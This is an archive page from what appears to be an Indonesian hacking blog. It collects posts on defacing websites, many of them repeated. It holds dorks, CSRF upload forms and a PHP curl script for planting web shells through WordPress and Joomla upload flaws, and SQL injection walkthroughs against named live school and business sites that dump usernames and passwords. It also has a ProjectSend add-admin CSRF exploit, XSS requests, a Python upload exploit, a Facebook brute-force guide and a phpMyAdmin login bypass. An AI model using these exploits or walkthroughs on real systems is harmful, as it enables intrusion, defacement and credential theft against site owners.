Showing posts with label Hacking. Show all posts
Joomla com_cckjseblod auto exploiter
Hi All i hope u are fine incha'Allah
i want share my new auto exploiter is for exploit LFI in joomla
this exploit can give us configs :)
watch video for know how is work
Script Here
i hope all clear
This Site Source http://magsec.blogspot.com
kcfinder exploit upload shell
Hi Guys today i want post a new exploit descovered today by INCEF-Team
is An exploit for upload shell in kcfinder
code of exploit :
<form method="POST" action="site/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ ndsxf</button>
</form>
if site infected will show u : "Unknown error"
shell format is : shell.php.ndsxf
Dork : inurl:/kcfinder/upload.php
and shell dir is : site/path/upload/files/shell.php.ndsxf
Post Copy By :Mr.MaGnoM
wordpress headway upload shell exploit
After long time finaly we get an exploit for upload shell in wordpress
in theme hadway all details u will find it in video
Tool link : here
i hope all clear :)
Tags :
wordpress headway upload shell exploit
exploit wordpress headway upload shell exploit
tutorial deface wordpress headway upload shell exploit
cara deface wordpress headway upload shell exploit
SQL INJECTION ON CMS BALITBANG
sql injection on cms balitbang
selamat datang dan selamat berkunjung para injector...:D
kali ini sya akan ngasih tutorial injeksi website pada cms balitbang.
seperti yang kita tahu cms balitbang memiliki banyak celah..mulai dari default password hingga registration member dengan inspect element.
tapi kali ini saya tidak akan membahas bug-bug di atas. saya akan fokus gmana masuk ke web berbasis cms balitbang dengan tekhnik sql injection.
ok..lets start..
alat2 yang di butuhkan
-kompi (wajib hukumnya.. :D)
-koneksi internet
-browser disarankan memakai mozilla firefox (karena kita akan menggunakan addons hackbar)
-hackbar. di sini sy memakai hackbar modifan. karena di dalmnya sudah include dios dan query untuk membypass waf. bisa di donlod di sini
http://smanunggulatim.sch.id/blog/AdvanceHackbar.xpi
otomatis terdownload,kemudian pilih yes..otomatis addons hackbar terinstall di browser anda. "penting di ingat bahwa hackbar di atas sangat berguna untuk kita melakukan injeksi"
-untuk dorknya silahkan berkreasi sendiri..
anggap aja kita udah punya targetnya,. di sini saya gunakan live target http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17&profil=Sarana+&+Prasarana
kita buka browser mozilla kita ..
kita lakukan test pada url dengan menambahkan tanda kutip ( ' )
http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17'&profil=Sarana+&+Prasarana
dan ternyata sebagian file hilang. berrarti bisa di pastikan web vuln sqli.
selanjutnya kita masukkan injeksi kita dengan cara http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+order+by+1--+&profil=Sarana+&+Prasarana
lakuan secara berutuan hingga ketemu erornya.. ok..ternyata eror ada di kolom 8
selanjutnya kita masukan perintah union select untuk mencari angka injeksinya http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+and+0+union+select+1,2,3,4,5,6,7,8--+-&profil=Sarana+&+Prasarana
ternyata muncul muncul angka ajaib yaitu 2 dan 3.
selanjutnya di sinilah fungsi hackbar kita tadi yaitu untuk melakukan dios(dump in one shoot)
buka hackbar dengan cara klik tools/show/hide hackbar atau tekan f9
kita blok angka ajaibnya di hackbar yaitu angka 3 kemudia klik UNIOON BASED -DIOS mysql -dios by madblood kemudian klik execute..(lihat gambar)
dannnn...wala...... muncul semua daleman webnya..;D
selanjutnya kita dump isi username dan passwordanya... bingo..... balitbang owned..:D
langkah selajutnya silahkan crack passwordnya dan silahkan login...tapi ingat jangan tebas index.
sekian tutorial cupu dr saya...maaf kalo ada salah2 dalam penulisan maklum masih belajar bikin tutorial kak..
NB: hackbar di atas bisa di gunakan juga untuk dios web lain.. mulai dari eror based hingga dios mssql.. untuk tutorial selanjutnya harap bersabar..makasih udah berkunjung..
Mampir Juga Ke Sumber ; http://tutorial-sqli.blogspot.com
selamat datang dan selamat berkunjung para injector...:D
kali ini sya akan ngasih tutorial injeksi website pada cms balitbang.
seperti yang kita tahu cms balitbang memiliki banyak celah..mulai dari default password hingga registration member dengan inspect element.
tapi kali ini saya tidak akan membahas bug-bug di atas. saya akan fokus gmana masuk ke web berbasis cms balitbang dengan tekhnik sql injection.
ok..lets start..
alat2 yang di butuhkan
-kompi (wajib hukumnya.. :D)
-koneksi internet
-browser disarankan memakai mozilla firefox (karena kita akan menggunakan addons hackbar)
-hackbar. di sini sy memakai hackbar modifan. karena di dalmnya sudah include dios dan query untuk membypass waf. bisa di donlod di sini
http://smanunggulatim.sch.id/blog/AdvanceHackbar.xpi
otomatis terdownload,kemudian pilih yes..otomatis addons hackbar terinstall di browser anda. "penting di ingat bahwa hackbar di atas sangat berguna untuk kita melakukan injeksi"
-untuk dorknya silahkan berkreasi sendiri..
anggap aja kita udah punya targetnya,. di sini saya gunakan live target http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17&profil=Sarana+&+Prasarana
kita buka browser mozilla kita ..
kita lakukan test pada url dengan menambahkan tanda kutip ( ' )
http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17'&profil=Sarana+&+Prasarana
selanjutnya kita masukkan injeksi kita dengan cara http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+order+by+1--+&profil=Sarana+&+Prasarana
lakuan secara berutuan hingga ketemu erornya.. ok..ternyata eror ada di kolom 8
selanjutnya kita masukan perintah union select untuk mencari angka injeksinya http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+and+0+union+select+1,2,3,4,5,6,7,8--+-&profil=Sarana+&+Prasarana
ternyata muncul muncul angka ajaib yaitu 2 dan 3.
selanjutnya di sinilah fungsi hackbar kita tadi yaitu untuk melakukan dios(dump in one shoot)
buka hackbar dengan cara klik tools/show/hide hackbar atau tekan f9
kita blok angka ajaibnya di hackbar yaitu angka 3 kemudia klik UNIOON BASED -DIOS mysql -dios by madblood kemudian klik execute..(lihat gambar)
dannnn...wala...... muncul semua daleman webnya..;D
selanjutnya kita dump isi username dan passwordanya... bingo..... balitbang owned..:D
langkah selajutnya silahkan crack passwordnya dan silahkan login...tapi ingat jangan tebas index.
sekian tutorial cupu dr saya...maaf kalo ada salah2 dalam penulisan maklum masih belajar bikin tutorial kak..
NB: hackbar di atas bisa di gunakan juga untuk dios web lain.. mulai dari eror based hingga dios mssql.. untuk tutorial selanjutnya harap bersabar..makasih udah berkunjung..
Mampir Juga Ke Sumber ; http://tutorial-sqli.blogspot.com
DIOS (dump in one shoot) dengan hackbar modif
dios (dump in one shoot) dengan hackbar modif
halo sobat injector..
kali ini saya akan ngasih sedikit trik gimana injeksi sql dengan hackbar modif.
kenapa harus hackbar modif..kenapa tidak hackbar yg original saja...
kalo pertanyaan itu sempat terlintas di benak sobat injector, jawabanya simple karena kemampuan dan kelengkapan querynya.
di dalam hackbar yg original hanya tersedia query untuk basic sql saja..sedangkan dalam beberapa kasus ada beberapa website yang menggunakan waf sebagai pengamanan website
untuk hackbar modif bisa di donlod di sini...http://smanunggulatim.sch.id/blog/AdvanceHackbar.xpi
ok langsung aja menuju tekape..
sebagai percobaan kita gunakan live target http://mediabisnistelematika.co.id/viewevent.php?id_event=9
pertama kita test url dengan menambahkan tanda kutip (')
muncul eror atau sebagian artikel/gambar hilang,, berarti injeksi dapat kita lanjutkan.
lakukan perintah order by hingga menemukan kolom eror.
ternyata pada web ini eror terdapat pada kolom 7
selanjutnya gunakan perintah union select
angka ajaib yang muncul 3 dan 4
ok next.. jika selama ini kita hanya tau group_concat(table_name) untuk dump daleman web, maka dengan hackbar modig ini kita tidak perlu repot2 untuk mengetik querynya..karena semua sudah tersedia,lengkap,praktis dan tentunya lebih rapi... kita hanya tinggal blok angka ajaibnya kemudian
klik union based dios mysql,dios by madblod...
dan wala............... semua sudah tersaji secara lengkap di depan anda...tanpa perlu repot memasukan querynya satu persatu.....
jika ingin melihat tampilan yg berbeda bisa gunakan dios yg lain..bisa di coba satu persatu... gmana sobat injector..cukup mudah bukan, ternyata sqli tidak serumit yang di bayangkan...
happy injecting...
Sumber
halo sobat injector..
kali ini saya akan ngasih sedikit trik gimana injeksi sql dengan hackbar modif.
kenapa harus hackbar modif..kenapa tidak hackbar yg original saja...
kalo pertanyaan itu sempat terlintas di benak sobat injector, jawabanya simple karena kemampuan dan kelengkapan querynya.
di dalam hackbar yg original hanya tersedia query untuk basic sql saja..sedangkan dalam beberapa kasus ada beberapa website yang menggunakan waf sebagai pengamanan website
untuk hackbar modif bisa di donlod di sini...http://smanunggulatim.sch.id/blog/AdvanceHackbar.xpi
ok langsung aja menuju tekape..
sebagai percobaan kita gunakan live target http://mediabisnistelematika.co.id/viewevent.php?id_event=9
pertama kita test url dengan menambahkan tanda kutip (')
muncul eror atau sebagian artikel/gambar hilang,, berarti injeksi dapat kita lanjutkan.
lakukan perintah order by hingga menemukan kolom eror.
ternyata pada web ini eror terdapat pada kolom 7
selanjutnya gunakan perintah union select
angka ajaib yang muncul 3 dan 4
ok next.. jika selama ini kita hanya tau group_concat(table_name) untuk dump daleman web, maka dengan hackbar modig ini kita tidak perlu repot2 untuk mengetik querynya..karena semua sudah tersedia,lengkap,praktis dan tentunya lebih rapi... kita hanya tinggal blok angka ajaibnya kemudian
klik union based dios mysql,dios by madblod...
dan wala............... semua sudah tersaji secara lengkap di depan anda...tanpa perlu repot memasukan querynya satu persatu.....
jika ingin melihat tampilan yg berbeda bisa gunakan dios yg lain..bisa di coba satu persatu... gmana sobat injector..cukup mudah bukan, ternyata sqli tidak serumit yang di bayangkan...
happy injecting...
Sumber
plugins vibe-shortcodes upload
Author : Rumput
Dork :/wp-content/plugins/vibe-shortcodes/ ( Use Brain )
Exploit : http://www.yaaka.cc/wp-content/plugins/vibe-shortcodes/upload_handler.php
Vuln : {"error":"No files were uploaded."}
Csrf :
<form enctype="multipart/form-data"
action="http://oni.chan/wp-content/plugins/vibe-shortcodes/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell :wp-content/uploads/years/month/shell.php Atau Bisa Dilihat Sendiri Nanti Muncul Dir Dan Nama Shellnya
Dork :/wp-content/plugins/vibe-shortcodes/ ( Use Brain )
Exploit : http://www.yaaka.cc/wp-content/plugins/vibe-shortcodes/upload_handler.php
Vuln : {"error":"No files were uploaded."}
Csrf :
<form enctype="multipart/form-data"
action="http://oni.chan/wp-content/plugins/vibe-shortcodes/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell :wp-content/uploads/years/month/shell.php Atau Bisa Dilihat Sendiri Nanti Muncul Dir Dan Nama Shellnya
Wordpress Fileuploader [ CSRF ]
Author : Rumput
Dork : inurl:/wp-content/themes/NameThemes ( Use Brain )
Exploit : /wp-content/themes/NameThemes/includes/fileuploader/upload_handler.php
Csrf :
<form enctype="multipart/form-data"
action="http://oni.chan/wp-content/themes/NameThemes/includes/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell :wp-content/uploads/years/month/shell.php
Ganbate Ne Cari Themesnya :v
Dork : inurl:/wp-content/themes/NameThemes ( Use Brain )
Exploit : /wp-content/themes/NameThemes/includes/fileuploader/upload_handler.php
Csrf :
<form enctype="multipart/form-data"
action="http://oni.chan/wp-content/themes/NameThemes/includes/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell :wp-content/uploads/years/month/shell.php
Ganbate Ne Cari Themesnya :v
Exploit Cameleon
Author : Rumput
Dork : inurl:/wp-content/themes/cameleon ( Use Brain )
Exploit : /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Csrf :
<form enctype="multipart/form-data"
action="http://www.whitepeaksoutfitters.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell :wp-content/uploads/years/month/shell.php
Dork : inurl:/wp-content/themes/cameleon ( Use Brain )
Exploit : /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Csrf :
<form enctype="multipart/form-data"
action="http://www.whitepeaksoutfitters.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell :wp-content/uploads/years/month/shell.php
Deface Exploit Wordpress Evolve Arbitrary File Upload Vulnerability
Hallow semua
Ketemu lagi dengan saya, kali saya akan memberi tutorial deface, sesuai judul di atas, langsung aja
Author : Indonesian Cyber Freedom
Dork : inurl:/wp-content/themes/evolve/js/ ( Bisa ente kembangkan lagi )
Exploit : /wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php
Code CSRF :
<form enctype="multipart/form-data"
action="target.com/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Cari target dengan menggunakan dork
klau vuln muncul seperti gambar seperti di bawah ini :
Buka code CSRF nya :
Buka CSRF tadi di browser ente, upload shell, klau berhasil akan seperti ini :
Shell access : http://site.com/wp-content/uploads/years/month/shell.php
Klau ada yg blom pnya shell, bisa download di sini
Download Priv8 Shania Shell
Sekian dan terima kasih =)
Source :
Visit our forum
Tutorial Hack facebook dengan brutoforce [ perl ]
yosh kali ini lagi matik aka malas ketik
jadi langsung aja
Perl bisa cari di google
Scriptnya
Caranya Simple aja
Ketik Command
cd c:\Dwimperl <- tergantung milik kalian masing masing
lalu kemudian
perl fb.pl username list.txt
disini fb.pl adalah script yang anda download tadi tergantung anda savenya jadi nama apa tapi yang pastinya ekstensi .pl
lalu list.txt kalian isi dengan list password bisa kalian cari wordlistnya di google
sekian saja dari saya terimakasih
jadi langsung aja
Perl bisa cari di google
Scriptnya
Caranya Simple aja
Ketik Command
cd c:\Dwimperl <- tergantung milik kalian masing masing
lalu kemudian
perl fb.pl username list.txt
disini fb.pl adalah script yang anda download tadi tergantung anda savenya jadi nama apa tapi yang pastinya ekstensi .pl
lalu list.txt kalian isi dengan list password bisa kalian cari wordlistnya di google
sekian saja dari saya terimakasih
Joomla com_myblog exploit
Langsung aja gausah banyak bacod
expliot "joomla com_myblog"
Dork: no dork for child [ Use your brain ]
Exploit: people_hurt/index.php?option=com_myblog&task=ajaxupload
Vuln code : {error: 'No file has been uploaded.', msg: '' }
Type file : jpg, gif, jpeg, bmp, swf, doc etc.
Ubah shell anda menjadi yourshell.php.xxxjpg
Saran: upload dulu uploader, Karena file yg diminta ukurannya kecil.
Code php:
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell acces :
target/images/yourshell.php.xxxjpg
target/images/0/yourshell.php.xxxjpg
target/images/blog/yourshell.php.xxxjpg
Oke segitu aja
Author : people_hurt - Indonesian Cyber Freedom
expliot "joomla com_myblog"
Dork: no dork for child [ Use your brain ]
Exploit: people_hurt/index.php?option=com_myblog&task=ajaxupload
Vuln code : {error: 'No file has been uploaded.', msg: '' }
Type file : jpg, gif, jpeg, bmp, swf, doc etc.
Ubah shell anda menjadi yourshell.php.xxxjpg
Saran: upload dulu uploader, Karena file yg diminta ukurannya kecil.
Code php:
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell acces :
target/images/yourshell.php.xxxjpg
target/images/0/yourshell.php.xxxjpg
target/images/blog/yourshell.php.xxxjpg
Oke segitu aja
Author : people_hurt - Indonesian Cyber Freedom
Com_adsmanager Auto Exploiter
karena gue males ngetik jadi gue coppas dari postingan gue sebelumnya :v
sekarang gue mau share script com_adsmanager scanner+autoexploiter
buat kalian yang suka mainan com_adsmanager, biar ga ribet, pake ini ;)
cara pake:
php adsmanager.php kerupuk.txt
adsmanager.php = script formcraft scanner+autoexploiter
kerupuk.txt = site yang mau di scan+autoexploit
screenshot:
*btw itu gue coba upload 3x jadi ada loader_3.php nya, kalo baru upload sekali pasti loader.php ga ada no nya :3 wkwk
screenshot :
tertarik?
download disini adsmanager.zip
baca file README.txt
kalo ga keberatan nitip nick: Kerupuk
wkwkw :v
sekian, thanks for reading :)
sumber : http://kerupukghost.blogspot.com
shoots: ZeynnymouZ
Auto Exploiter com_adsmanager with xampp
Bahan:
-auto.php ( http:// pastebin.com/ dqRt7ZeT ) yang ane recoded dari script scan+upload shell milik bang Tu5b0l3d
-shell andela milik bang Syahrul Ramadhan ( http:// pastebin.com/ XS46vPpU )simpan shell dengan ext jpg (andela.jpg)
Caranya Tinggal Masukin Dork aja
(kalo website vuln tapi upload shell gagal berarti shell tidak bisa di akses atau Forbidden
Sumber Show Off Incef
-auto.php ( http://
-shell andela milik bang Syahrul Ramadhan ( http://
Caranya Tinggal Masukin Dork aja
(kalo website vuln tapi upload shell gagal berarti shell tidak bisa di akses atau Forbidden
Sumber Show Off Incef
Formcraft Auto Exploiter
Assalamualaikum =))sekarang gue mau share script formcraft scanner+autoexploiter
buat kalian yang suka mainan formcraft, biar ga ribet, pake ini ;)
cara pake:
php formcraft.php kerupuk.txt
formcraft.php = script formcraft scanner+autoexploiter
kerupuk.txt = site yang mau di scan+autoexploit
screenshot:
kalo udah beres, kita liat site yang udah ke upload shell kita di f.htm
screenshot :
tertarik?
download disini formcraft.zip
baca file README.txt
kalo ga keberatan nitip nick: Kerupuk
wkwkw :v
sekian, thanks for reading :)
Sumber : http://kerupukghost.blogspot.com
Bypass Login PhpMyAdmin [ By Mr.ApaPedulimu ]
hai kali ini saya kembali dengan tutor kecil yaitu Bypass Login PhpMyAdmin
biasanya anda setiap mau login ga bisa masuk login area atau nout found
jangan dibuang
coba menggunakan mysql intertace jika tidak bisa site/phpmyadmin/dbhost atau bisa coba buka db host saja percaya tidak percaya itu ada pengaruhnya
kali ini saya memberi 1 target
silakan kalian coba
dengan cara diatas gagal semua lalu apa anda akan membuangnya
eits tunggu dulu
cara bypass cukup mudah
hanya mengubah link menjadi site/"dh"_phpmyadmi/dbhost tanpa kutip
atau coba LIVE TARGET
cukup mudahkan ^_^
silakan kalian coba gali site yang terbuang :v
sekian dari saya trimakasih
Klik gambar bantu like fp boleh lah :v
sampai jumpa lagi
biasanya anda setiap mau login ga bisa masuk login area atau nout found
jangan dibuang
coba menggunakan mysql intertace jika tidak bisa site/phpmyadmin/dbhost atau bisa coba buka db host saja percaya tidak percaya itu ada pengaruhnya
kali ini saya memberi 1 target
silakan kalian coba
dengan cara diatas gagal semua lalu apa anda akan membuangnya
eits tunggu dulu
cara bypass cukup mudah
hanya mengubah link menjadi site/"dh"_phpmyadmi/dbhost tanpa kutip
atau coba LIVE TARGET
cukup mudahkan ^_^
silakan kalian coba gali site yang terbuang :v
sekian dari saya trimakasih
Klik gambar bantu like fp boleh lah :v
sampai jumpa lagi
Tutorial Deface In Android With Exploit Revslider + Edit post with phpmyadmin
Yosh kali ini saya kembali dengan tutorial baru setelah lama ga post
kali ini kita akan membahas Tutorial Deface In Android With Exploit Revslider
ok langsung saja,mengenail tool bisa menggunakan dari saya DISINI atau menggunakan milik kalian masing" yang telah diupload ke web atau bisa menggunakan KSWEB untuk upload di localhost
membukanya dengan cara http://localhost:8080/nama.php
jika kita sudah membuka tools masukan site dan get config
kalau yang dari tools saya gak make http:// or https://
kalo kalian yang belum tau bisa gunakan $host='http://'; agar ga repot nambah http:// or https://
lalu tambah ($host) di $dn=($bda).($linkof); menjadi $dn=($host) .($bda).($linkof);
catatan ini kalau script yang dari BLOG saya
oke kita lanjut lagi, begini tampilan lokasi setelah kita get config
selanjutnya kita buka tab baru buka dengan nama db host saja bisa contoh dari ss mysql.fivestarlaw.us
atau bisa juga menggunakan http://www.fivestarlaw.us/dh_phpmyadmin/mysql.fivestarlaw.us
lalu masukan db username dan db password
setelah masuk klik user ribagian sebelah kiri
lalu diatas kelik browse
lalu berikutnya kelik gambar pensil atau artinya edit untuk mengubah password
setelah itu ganti password dengan password anda yang sudah di hash ke md5 bisa hash DISINI
kalo sudah tinggal login dan edit atau upload seperri biasa bagi yang belum tau bisa cari di site ini
berhubung ini ga ada admin login saya kasi tambahan edit post lewat phpmyadmin
seperti sebelumnya ambil disebelah kiri lalu klik post kemudian klik pensil lagi
jika sudah edit post yg sudah ada dengan kata kata kamu lalu save
untuk lokaai post liat yang paling bawah di SS ada link itulah link yang kita edit
terimakasih sebelumnya jika ada yang belum mengerti silakan bertanya
maaf template masi acak acakan -_-
sampai jumpa di post berikutnya
Joomla Component com_adsmanager Remote File Include
Joomla Component com_adsmanager Remote File Include
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://downloads.ziddu.com/downloadfiles/10982893/com_adsmanager.zip
.:. Dork : inurl:"com_adsmanager"
####################################################################
===[ Exploit ]===
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]
####################################################################
Sumber : https://www.exploit-db.com
ProjectSend Multiple Vulnerabilities
#[+] Author: TUNISIAN CYBER
#[+] Title: ProjectSend Multiple Vulnerabilities
#[+] Date: 25-04-2015
#[+] Vendor: http://www.projectsend.org/
#[+] Download:http://www.projectsend.org/download/67/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
It's a long one so let's start...
I/ CSRF: Add Admin
<html>
<head>
<title>ProjectSend CSRF (Add User)</title>
</head>
<body>
<form action="http://192.168.186.129/ProjectSend-r561/users-add.php" method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="add_user_form_name" value="CSRF OPS" />
<input type="hidden" name="add_user_form_user" value="TUNISIANCYBER" />
<input type="hidden" name="add_user_form_pass" value="password" />
<input type="hidden" name="add_user_form_email" value="pwn3d@csrf.com" />
<input type="hidden" name="add_user_form_level" value="9" />
<input type="hidden" name="add_user_form_active" checked="checked" />
</form>
<>
.getElementById("CSRF").submit();
</>
</body>
</html>
0x0Proof:
http://i.imgur.com/t77Plve.png
II/ CSRF: Change Admin Password:
<html>
<head>
<title>ProjectSend CSRF (Change Password)</title>
</head>
<body>
<form action="http://192.168.186.129/ProjectSend-r561/users-edit.php?id=1" method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="add_user_form_name" value="User changed" />
<input type="hidden" name="add_user_form_user" value="admin" />
<input type="hidden" name="add_user_form_pass" value="password" />
<input type="hidden" name="add_user_form_email" value="newemail@opss.net" />
<input type="hidden" name="add_user_form_level" value="9" />
<input type="hidden" name="add_user_form_active" checked="checked" />
</form>
<>
.getElementById("CSRF").submit();
</>
</body>
</html>
III/ XSS_1 (index.php):
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
0x0Proof:
http://i.imgur.com/TDfFDU3.png
IV/ XSS_2 (clients.php):
http://192.168.186.129/ProjectSend-r561/clients.php
POST /ProjectSend-r561/clients.php HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
search=%22%3E%3C%3Ealert%28%220000%22%29%3B%3C%2F%3E
HTTP/1.1 200 OK
Date: Sat, 25 Apr 2015 21:15:13 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2851
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
0x0Proof:
http://i.imgur.com/ywf8JdF.png
V/XSS_3 (actions-log.php)
http://192.168.186.129/ProjectSend-r561/clients.php
POST /ProjectSend-r561/clients.php HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
search=%22%3E%3C%3Ealert%28%220000%22%29%3B%3C%2F%3E
HTTP/1.1 200 OK
Date: Sat, 25 Apr 2015 21:15:13 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2851
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
0x0Proof:
http://i.imgur.com/cVKIhj3.png
VI/ File Upload:
(Exploit oirignally found by Fady Mohamed Osman )
Rewrittend by TUNISIAN CYBER
#!/usr/bin/env python
import requests
print"+---------------------------------------+"
print"| ProjectSend File Upload Vulnerability |"
print"+---------------------------------------+"
vuln = raw_input('Vulnerable Site:')
fname = raw_input('EvilFile:')
with open(fname, 'w') as fout:
fout.write("<?php phpinfo() ?>")
url = vuln +'/process-upload.php' +'?name=' + fname
files = {'file': open(fname, 'rb')}
result = requests.post(url, files=files)
print "===>" +vuln+"/upload/files/"+fname
Sumber : http://www.sec4ever.com
HotBot auto Dorker
Hi Guys
after long Absence because study and some shits in real life
i'm bak to share my privat tools with all
today i gona show u old tool coded by me in 2014 but is gold tool and i never shared it
is a dorker of http://www.hotbot.com/ with php
is good site for dorking :D and grabbing
watch vedio
Tool Here
Thanks : http://magsec.blogspot.com
Subscribe to:
Posts (Atom)